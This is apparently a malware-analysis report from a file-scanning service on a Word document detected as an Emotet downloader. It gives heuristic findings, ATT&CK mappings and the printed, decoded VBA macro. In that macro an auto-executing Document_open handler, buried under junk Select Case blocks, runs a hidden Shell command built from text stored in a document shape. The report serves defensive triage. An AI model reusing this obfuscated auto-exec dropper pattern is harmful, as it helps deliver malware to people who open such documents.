MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within a VBA macro. This macro is auto-executed via Document_open, and further evidence shows it invokes cmd.exe with obfuscated arguments. The ClamAV detection name 'Doc.Downloader.Emotet-6775097-0' strongly suggests the Emotet family, which commonly uses this technique to download and execute secondary payloads.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6775097-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6775097-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select nMjzDYjYJ = Array(CJCvzViTJ, iXlcNilE, tZoKcC, Interaction.Shell(IlYKq, MYiASQ), poiFvc) Select Case mqlEESUSAhShbwUZwz -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9000 bytes |
SHA-256: 347d6b366a5636dc58aa2625707fa7aee0c7252ba223c734156c634ef858905c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
196 of 235 identifiers look randomly generated (e.g. 'qMlFoLHajZHpMPtqqDOnkJbo') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ikRfcHzaBSn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case QFipNBrkVKTmVUArwHjzN
Case 197552696
RKIQdpFuowXuCCWmUj = 130387971
qDJqtlVMuikXmlQiFl = 95552863
PQiozZwpbUMTuIdNASXrUtz = ChrB(39545547 / ChrB(93672958))
IQlshjSYGZZVsUnjlZWRddID = mOXaWRYawRhEindAVBDo
Case 207091208
CDnHZjzWiIiOvUvzkIA = 311672524
DFcCmtQIcEOwMLTnOrpdcmZ = 146716032
sIFXRuokjzwLFnqjNC = ChrB(24081085 / ChrB(129091520))
iJbKVRKSSQjFiulKk = 69118791
End Select
Select Case mhXOjwwScCVmKtakrcJAG
Case 339971014
ijPRvJCHCsISoFdMwG = 241062477
DMaCSvTpitiinJtiRf = 3279918
ZvTtCblfOPMuVdT = ChrB(113162937 / ChrB(61427905))
zzqNZINdffLwvRGc = ItjzqKnaShkIKqcVEfARMVKj
Case 164452117
GUPUuotjKXdMIpDmHadVVoic = 279579920
FKknjAauESLwnwOdfFsrWL = 92677746
NjCDaRlmdIiivXoclOk = ChrB(239941103 / ChrB(179365290))
nhGrJdkwOuwJZzz = 154194607
End Select
Select Case TTKUDcajiZVpkYt
Case 315313549
bkrNcawQmAVaHuhm = 257510686
SbclCnLTdhzYvhNqlk = 7828163
qsOERbEJWioCzDaUhqhDBJw = ChrB(98394500 / ChrB(111486680))
FoMRJzltiaMXUaiC = zswbrGsIvCzrhvznDVQwFVrR
Case 25600122
AIJWGUzNzVUmOiUJOun = 12146560
iMkQESFriBfXRFkwYvcsUzdT = 114477279
hcwGwdCcVvZFBCu = ChrB(145708311 / ChrB(129246955))
pOwcjKpwLJcjiQwzkc = 308403261
End Select
Select Case kJGGjdpuaPMpIjWiurIC
Case 77921048
zuthjUmoWKRlhRpIDQSwUWJO = 183856992
IUdvnkTmJLMCwUImtBYW = 336485440
smnskNcdkiFAMSK = ChrB(179751743 / ChrB(149644320))
RuIivBTzqicHqEjDcrHv = GKjaiwwHqbRfrF
Case 31528204
NrlYmXuAcoAUJpTTbjLjbENF = 155296793
zGKczzbGOzVWNjQfztvbwA = 50781171
DKtUVJijBzXnpApAsCbUzFTc = ChrB(130971403 / ChrB(316338052))
TJvrzzMZoGGlFUp = 139434703
End Select
Select Case SPKnoMVDAziDnsO
Case 268473118
JSrwItKzcSAEFf = 33303271
rpUscCuoLOORWYSMH = 265144455
tMMJWzqMuVwuSZmwDtwXHYDk = ChrB(303399245 / ChrB(205203638))
aDzozRjLFifwsmpzTNTvsjc = SLQoUIbPrGQJuhBcj
Case 90142509
RXvDlRYkXajAqakVlBuqw = 20925612
HmVfFlMqMiCLsWIiW = 316297456
DpHFZjKLPboXkOHoRPm = ChrB(127660816 / ChrB(332710753))
jWWoPszdWXuYzazj = 321271219
End Select
Select Case HUOwMcdOLJHiFiEsGvvEBill
Case 136325854
CLvwzdKNHMaoGMuJ = 16379839
rkRjCYjLrNzcicbw = 174557565
TMLiTrasRSoiJsbau = ChrB(240115594 / ChrB(315328481))
IWSmlzQidzMImcqpz = QaJJHOXJDEBHirCI
Case 60394139
uZsWavOTFjwhBmbjUVIzPEPc = 303927143
dWPUGdTtvaVuzOun = 55209273
MWDPjCXhzJhpKQbORsEkZSN = ChrB(53765012 / ChrB(280893717))
LZVuEcwYPXIOpM = 325242938
End Select
Set JMFPESl = ikRfcHzaBSn.Shapes(CiXQtJvYf + "hJGsTkkCXRzq" + zLEFFtmAE).TextFrame
Select Case GDLVifpsNsWnnOzpZHD
Case 296834056
FDCorQJOCQlJlSA = 308366601
wYYlfGUvcqFJOmhzWBzJjnP = 212087119
LbkiBwzuiIiUTawisOZE = ChrB(31250559 / ChrB(263012728))
ELPRAlKLJsHTijRauGPf = CcCbDbnYpcZXzjTmiwIX
Case 324508205
cLGSwboizpIACiMqzK = 150010034
TQhwhDzoQIGHjjAqUkdMkK = 200707076
PwikZoAwBKCMiJkudzOpj = ChrB(941250 / ChrB(136351406))
iVVMhKCIlzhkZNObHH = 44362181
End Select
Select Case JTqQNlNjizMRwJGZ
Case 143838122
SIvIbSOpjdjLrFFbdOld = 243258070
fcbNlKTDqXvjwBO = 4208892
XCYEkwXIHLXfrnsrMdTjNjD = ChrB(146797478 / ChrB(195860742))
MPLHEMcWNaMBvfEEiwvXwj = olYvTirwCawkIz
Case 3010485
LCVaRfKhncJCEaG = 267041861
LWVfQJrWcKbwvwHdrjUd = 63921872
IbqIrVoubUIHwafbvtdDp = ChrB(136422121 / ChrB(230412524))
rjBYMrlKSaNtpHRWhhjHq = 260388096
End Select
Select Case YtwiTNdBwsknCQPMfwqlhYmc
Case 281626043
jEwVFEImCzFCBMSBLSbrWk = 119739775
bDaORAGVnjdZFdnjiQOQ = 41703947
ziSjMUBzQzmQuCdtUBsk = ChrB(96386739 / ChrB(139655173))
twifuMFWCYwFwwlomUoPi = oilDkvMXWOcvZkipGmKcks
Case 319803116
hzjNFPaFEGIztrbKKiCjdAWB = 64519120
NBEBCvloWmMwSGoWqSbivPKA = 121770917
pMSjbiEHBYBDEMO = ChrB(32541167 / ChrB(135606264))
zMMwvHJEZfCwrDiwGYWqLd = 303970696
End Select
IlYKq = JMFPESl.ContainingRange + UnOPQq + DGttRL + JYFDjw + Fpiid + BrjmWp + MDWAcC + LTpUV + iWSGK
Select Case liSckXQfiUQfENjMcWsJtti
Case 187164875
DzswDqjAothTzLqMK = 201604770
oYsUVfJUViBrEqM = 217247720
XiaihiQTzsiLBziOWor = ChrB(75222834 / ChrB(191972105))
QuVNRmCcdliQobEdGu = BWmiJUlSdhCUVwBSfIT
Case 83857104
RWOthkJGKthzjczdPMtj = 135714254
vbRIUmJYUnhwjAYlbjb = 76711863
oUWlUCoQvajIsbmbY = ChrB(106789537 / ChrB(152486109))
lYtQlswFdkJFIGHGuWzkVIZN = 9022965
End Select
Select Case WmUIUMMBYYZBRtkF
Case 28431826
suMoIvwAVnMjhEtiKkqff = 238984763
oYrihiuUhZhvQwiiYJTqY = 269957524
rVIiizOYDHKYPQQRSbTfGzJ = ChrB(194652512 / ChrB(237170925))
GRVMtLzfAJZzLUTBinFZ = NIsAPFJmsMiwGtwCr
Case 93244142
ZjQHrTQwLEVVYKJsJcLiFptI = 322115486
AEbWwmZGAjzBAhzHwhXrGow = 6072644
ZfjtkpHKzTLWpGivRKauIc = ChrB(198395135 / ChrB(206267773))
qMlFoLHajZHpMPtqqDOnkJbo = 311345539
End Select
Select Case uNpikoBMZlMiMs
Case 170184484
JaRbzFVUpYSkfiJHYdqiVQw = 324529620
sCTYhKWtskjSNDosV = 300245799
WQhucFKiBrYsdUIH = ChrB(22116688 / ChrB(12013634))
HOvqmtdpLZCqAXkaCLHrTWbV = TrCzEwlqZlwbZu
Case 5493347
QzIzBYVstGwvKbkmaoTCarGd = 115173984
almzcQGsDXTVBvVJEzApjzAL = 5546648
bwYYsfhBzkGtifoRYNTEm = ChrB(157749551 / ChrB(214919951))
mJdcTdkazqpIUiino = 1620402
End Select
Select Case XjmVOzapFFFcBDRnCP
Case 308009121
DaiOSdZZFMcAsfsGoIkjoHw = 126916025
rfnjHXckwSzBYClXA = 234725440
dFjWKKwufLDwiLAbzmqwozP = ChrB(316615307 / ChrB(82679068))
EQFzMnXDpJHJdYIdzZtVSqXb = kKlEdpnJOFhofzPZbVqToJ
Case 113587183
LCqCqcOsiLbcmwLTTzOTbo = 114104162
iwrUhHzbtvsbzlTlqoK = 136159602
mncKXzouwOXlQYukuLW = ChrB(74269894 / ChrB(1455523))
rGkUijccmiwCrJPKKHLjv = 213376484
End Select
Select Case NtkHqCOZEdBVjofMbXJDOl
Case 248873808
SvBqpTBBjrWczuYzFOGH = 301479617
oSwThTdaacHGpuBXj = 243155071
zmpRDMhwMwziikCHiuV = ChrB(246306318 / ChrB(220257930))
IRuUtEivhfVfuczAsH = URcazcVmnTdNzu
Case 184828019
YXiTcURQUIzqaHhBOlMF = 205801367
wrXSqbERWkSzbdKnXzAMFpd = 204371731
jlczOhWzhaqvKipL = ChrB(22806252 / ChrB(252819708))
YcjDraNNFSkHOsGKq = 184968943
End Select
Select Case ruRiEzlXKIrtHh
Case 206681885
wjqoJBMQRYCiEMhMp = 338039845
WOOPdRjJqsrWizMpQhtr = 281047702
BRfwHSwaiDIFIDiUMXcrV = ChrB(159161505 / ChrB(165103731))
YjsWQivHmoNzjh = NLPOoOZoJHwVWOwM
Case 190713314
dXaabKzIASUpklfNPjFKknz = 294680227
PUJZsnckFFJinkFOjNGUT = 152820701
pIzSGSHqXiqLpqiI = ChrB(206410056 / ChrB(285795477))
ifVfcwzvEZtYQrJ = 130387316
End Select
Const MYiASQ = 0
Select Case KHYDfERqjiWwLrGjutYGpL
Case 87272216
HCqOkJtaOrzwmVvNmvFpAlji = 25316843
hjBTwzuZwdODFXpw = 238082632
rHtYwLTuGXwWWHKXcK = ChrB(162853663 / ChrB(309008751))
AEMZSzjphAEBLqvTIkqzDsX = aGGsiufXpbrDhzjLkEY
Case 151264258
ULRODUZhvpHhmzLsqHnVhMj = 340146003
mJEiOwUAjFvpiiaFptmjWvz = 133033865
uzkBMIbRWRLUDjqnjF = ChrB(303490904 / ChrB(107719539))
MdNPrSzQVrJkLU = 10507286
End Select
Select Case BziAmWwPuwwHqVEkBiqQHaLO
Case 234234766
qwXAuwLNYUBWfsLFtkScoKTw = 139937864
iCobnPQofAstBCvdwkjf = 336971081
FChbwGKfiYiSRJYzjlFqNKNz = ChrB(232254031 / ChrB(105648661))
KOjPpdhwmtMTJizWTPik = EwDzZIjuphsjazRuJpokMm
Case 24772352
SwMNntkAfuGPfRPVzC = 323986608
UmjfibJZuAZRvkfd = 317134210
GvzrAfsCPsZTmKprzf = ChrB(84972922 / ChrB(214631868))
MkKFfUoUvmmZavBOcmDm = 213675115
End Select
Select Case bqQsiwrLNjBAoZOGHVttrcG
Case 28708172
rQKTRkdNwCfdQKz = 58217552
zwQFXrvfOnpHzwk = 77561641
rhhrvvXmsXjdqKtljfIoAU = ChrB(169358077 / ChrB(98435911))
CzoGwEvRdTSbQBCsSiTMCX = vWPSbXnWHSDswjjvTnMN
Case 284656947
JTdFvhpFClfUtkhlTtp = 321544175
JNIEJmjAYqJlTMwp = 145611096
FhCPRNdpwOhTSXuRAFUB = ChrB(248866050 / ChrB(308885329))
EdvVjaXkwzRkPHt = 310872346
End Select
Select Case mhLLwHpWHnNAuAGsGDIHjdEZ
Case 53975378
jchUYwDvZHrXnpGKz = 189345694
dKFuaZzuZMJdmDiXMomOO = 323031582
bzBjQTAZjbpiEiiGvaDiiQiF = ChrB(128297606 / ChrB(30792703))
tVKOVjLivZphbYndB = YitiiroLSQKUwQLBGDVNTwtz
Case 253453705
GscFvmcIuaYPnTZKNvTa = 193763453
WaRjHndaltsBlviMVYr = 262386121
kcrQBnIkzjLDhWCoLi = ChrB(269821998 / ChrB(202549145))
pfWmiicBavjpDlzZSF = 1062228
End Select
nMjzDYjYJ = Array(CJCvzViTJ, iXlcNilE, tZoKcC, Interaction.Shell(IlYKq, MYiASQ), poiFvc)
Select Case mqlEESUSAhShbwUZwz
Case 251329651
BIsICwrWAKhPcE = 43377898
tlkmQnFBcABzkkHpMTTdwc = 18099088
azSqADEWpjfMMzm = ChrB(94572894 / ChrB(19567207))
fCvrlPDrDJlcpQidLSUPBZ = iJDEudMjEaIzAMjLCmIzulNr
Case 97728898
ioTtnoFGQhiLJOrdjBjT = 222418773
bGRdtZAtwMpPuXNLn = 132603564
tvBdrdtIRELKuwSMMbKvfFX = ChrB(244601677 / ChrB(139902660))
tTTQVOMcnUacaAzRjo = 247877836
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.